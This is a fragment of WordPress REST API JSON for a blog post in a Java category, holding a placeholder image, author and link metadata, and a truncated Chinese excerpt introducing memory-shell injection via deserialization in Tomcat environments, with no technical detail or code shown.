src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-32\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u5728\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u5b9e\u6218\u4e2d\uff0c\u901a\u5e38\u9047\u5230\u73af\u5883\u90fd\u662f\u5efa\u7acb\u5728\u4ee5Tomcat\u4e3a\u5bb9\u5668\u7684\u73af\u5883\u4e2d\u7684\u3002 \u800cTomcat\u5177\u6709\u4e00 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-30","post","type-post","status-publish","format-standard","hentry","category-java"],"_links":{"self":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":2,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions"}],"predecessor-version":[{"id":33,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions\/33"}],"wp:attachment":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/media?parent=30"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/categories?post=30"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/tags?post=30"}],"curies":[{"name":
"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}